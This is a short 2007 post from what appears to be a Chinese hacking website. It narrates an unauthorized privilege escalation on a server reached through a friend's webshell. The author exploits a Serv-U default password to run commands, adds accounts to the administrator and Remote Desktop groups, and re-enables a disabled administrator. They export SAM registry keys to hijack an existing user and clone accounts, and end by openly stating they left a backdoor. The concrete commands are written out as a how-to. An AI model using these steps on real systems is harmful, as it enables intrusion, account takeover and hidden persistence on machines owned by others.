您现在的位置: 骇客基地 >> 黑客文章 >> 漏洞研究 >> 正文

巧用SU添加管理帐号
骇客基地 阅读: 时间:2007-9-6 6:44:14 来源:www.hookbase.com
   今天朋友扔来一webshell让提权,SU默认密码没改,可执行命令,添加管理员后登陆,出现没有权限

估计是组策略设置了管理组没入终端登陆组,然后net localgroup "Remote Desktop Users" user /add

朋友说还不行,然后就准备reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg

然后修改administrator密码登陆,晕,竟然给禁用了,

net user administrator /active:yes 启用管理员帐号登陆

还是没有权限,看来真的是默认管理组没有终端登陆权限,或者设置了默认管理员的权限

继续...net localgroup "remotedesktop users"查看终端用户

reg export HKLM\SAM\SAM\Domains\Account\Users c:\user.reg 把全部用户备份

然后随便修改一个终端组的用户密码登陆.yeah.成功.

然后把修改过的密码的帐号注册表文件全都导入,克隆帐号,留后门.

闪人...
今天广告
参与评论:
注意事项:
【巧用SU添加管理帐号】文章由骇客基地网上搜集,其立场行为并不代表本站。
如果您发现该文章若无意中侵犯到您的权利,请联系我们!
未经本站明确许可,任何网站不得非法盗链及抄袭本站资源;如引用页面,请注明来自本站,谢谢您的支持!
最近更新
最新推荐
     
 
黑客首页 | 服务指南 | 软件发布  | 关于我们 | 本站声明  | 隐私声明 | 诚征英才 | 网站地图 | 友情链接 |
 
 
中国·黑客·骇客·基地 请使用IE6.0版本, 分辩率1024×768进行浏览 www.hookbase.com 站长:利客 Email:hookbase@163.com
Copyright © 2004-2009 All Rights Reserved. 粤ICP备05000985号